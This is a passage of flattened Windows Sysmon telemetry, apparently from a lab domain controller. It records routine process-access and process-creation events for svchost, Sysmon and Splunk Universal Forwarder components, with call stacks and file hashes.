13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85D5-5FCF-0501-000000009101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D5-5FCF-0501-000000009101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-85D5-5FCF-0501-000000009101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.259{10ACEC4A-85D5-5FCF-0401-000000009101}48284844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D5-5FCF-0401-000000009101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85D5-5FCF-0401-000000009101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.118{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D5-5FCF-0401-000000009101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.119{10ACEC4A-85D5-5FCF-0401-000000009101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D7-5FCF-0601-000000009101}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows